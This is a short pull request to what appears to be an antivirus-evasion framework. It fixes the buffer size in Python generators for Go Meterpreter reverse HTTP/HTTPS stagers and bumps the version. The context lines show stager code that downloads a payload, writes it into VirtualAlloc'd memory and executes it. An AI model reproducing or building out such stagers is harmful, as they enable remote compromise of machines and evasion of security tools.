### PR TITLE
Fix for go buffer length issue with updated meterpreter dll

### DIFF
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,3 +1,7 @@
+[11.15.2015]
+     Released.: 2.22.2
+     Updated..: Pure go stager payloads now have the correct buffer length for the latest meterpreter dll.  Fixes issue #243
+
 [9.19.2015]
      Released.: 2.22.1
      Updated..:  Fixed issue with msfvenom output change and command line usage, updated in pull requests #218 and #219, thanks to gryffus for the patches! 

--- a/modules/common/messages.py
+++ b/modules/common/messages.py
@@ -8,7 +8,7 @@ import settings
 import helpers
 
 
-version = "2.22.1"
+version = "2.22.2"
 
 
 # try to find and import the settings.py config file

--- a/modules/payloads/go/meterpreter/rev_http.py
+++ b/modules/payloads/go/meterpreter/rev_http.py
@@ -96,7 +96,7 @@ class Payload:
         payloadCode += "defer %s.Body.Close()\n" %(response)
         payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
         payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
-        payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
+        payloadCode += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
         payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
         payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
         payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)

--- a/modules/payloads/go/meterpreter/rev_https.py
+++ b/modules/payloads/go/meterpreter/rev_https.py
@@ -100,7 +100,7 @@ class Payload:
         payloadCode += "defer %s.Body.Close()\n" %(response)
         payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
         payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
-        payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
+        payloadCode += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
         payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
         payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
         payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)


### PR DESCRIPTION
Fix for issue #243 